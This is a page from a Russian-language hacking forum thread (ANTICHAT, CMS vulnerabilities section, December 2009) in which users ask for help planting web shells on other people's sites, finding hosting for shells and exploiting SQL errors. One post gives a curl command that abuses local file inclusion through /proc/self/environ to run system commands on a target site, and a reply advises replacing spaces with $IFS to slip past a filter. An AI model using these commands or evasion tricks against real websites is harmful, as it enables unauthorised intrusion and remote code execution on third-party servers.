HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #31  
Старый 02.12.2009, 01:00
alt_Apocalypse
Новичок
Регистрация: 18.11.2009
Сообщений: 1
С нами: 8674166

Репутация: 0
По умолчанию

люди, когда я пытаюсь зайти на сайт через шелл, мне показывает шелл на хостинге где я его поместил. как сделать чтобы он ни мой хост открывал, а уязвимый сайт? может на хосте отключить пхп? или как еще можно?
 
Ответить с цитированием

  #32  
Старый 03.12.2009, 01:00
UnCoLoR
Новичок
Регистрация: 03.12.2009
Сообщений: 1
С нами: 8652566

Репутация: 0
По умолчанию

парни вот я коечто получил из сайта скажите что из этого можно извлечь? файл прикреплен
 
Ответить с цитированием

  #33  
Старый 06.12.2009, 01:00
scroller20
Новичок
Регистрация: 22.10.2009
Сообщений: 4
С нами: 8713046

Репутация: 3
По умолчанию

Люди а мне никто не поможет????:em14:
 
Ответить с цитированием

  #34  
Старый 06.12.2009, 01:00
Ali_run
Новичок
Регистрация: 06.12.2009
Сообщений: 1
С нами: 8648246

Репутация: 0
По умолчанию

Привет, всем я тут новичек. Вот я пишу сам сайты на PHP.
Движки не очень люблю юзать. Всегда пишу сам. и только вчера написал движок с использованием инклюд для облегчения работы, и нашел на этом сайте почти полную копию моего уязвимого инклюда =) Помогите как избежать этого.

code:

 
Ответить с цитированием

  #35  
Старый 08.12.2009, 01:00
Mater
Новичок
Регистрация: 22.03.2007
Сообщений: 4
С нами: 10072637

Репутация: 7
По умолчанию

подскажите пожалуйста какой-нибудь хостинг чтоб shell залить(кроме народа а то он чё то не пашет)
 
Ответить с цитированием

  #36  
Старый 08.12.2009, 01:00
SokoL
Banned
Регистрация: 27.04.2010
Сообщений: 0
С нами: 8442499

Репутация: 0
По умолчанию

В инклуде далеко не лучшее место для динамически подставляемых переменных.
 
Ответить с цитированием

  #37  
Старый 08.12.2009, 01:00
z0mbie
Новичок
Регистрация: 22.03.2009
Сообщений: 0
С нами: 9020484

Репутация: 0
По умолчанию

t0xA, у меня имееться ссылка вида http://site.com/test.php и при переходе на неё выходит ошибка: Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/baza/data/www/site.com/test.php on line 5 . Я знаю много сайтов с подобными ошибками и но как иньекцию произвести незнаю подскажи что делать. И ещё вопрос для чего раскрытие пути нужно?
 
Ответить с цитированием

  #38  
Старый 09.12.2009, 01:00
zic
Новичок
Регистрация: 04.04.2003
Сообщений: 7
С нами: 12157968

Репутация: 5
По умолчанию

юзаю lfi, выполняю запрос -

Цитата:


curl "http://site.com/index.php?page=../../../../../../../../proc/self/environ&cmd=system(ls);" -h "user-agent: " > info.html



всё работает на ура! выполняю запрос -

Цитата:


curl "http://site.com/index.php?page=../../../../../../../../proc/self/environ&cmd=system(ls -la);" -h "user-agent: " > info.html



не проходит..... скорей всего дело в пробеле...как это обойти? кто поможет, плюс в репу обеспечен!
 
Ответить с цитированием

  #39  
Старый 14.12.2009, 01:00
Mater
Новичок
Регистрация: 22.03.2007
Сообщений: 4
С нами: 10072637

Репутация: 7
По умолчанию

Скрипт фильтрует пробел.... Попробуй замени символ пробела на $IFS
 
Ответить с цитированием

  #40  
Старый 28.12.2009, 01:00
Dn7
Новичок
Регистрация: 25.12.2009
Сообщений: 18
С нами: 8620886

Репутация: 2
По умолчанию

:glass: всмысле, ошибка?
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.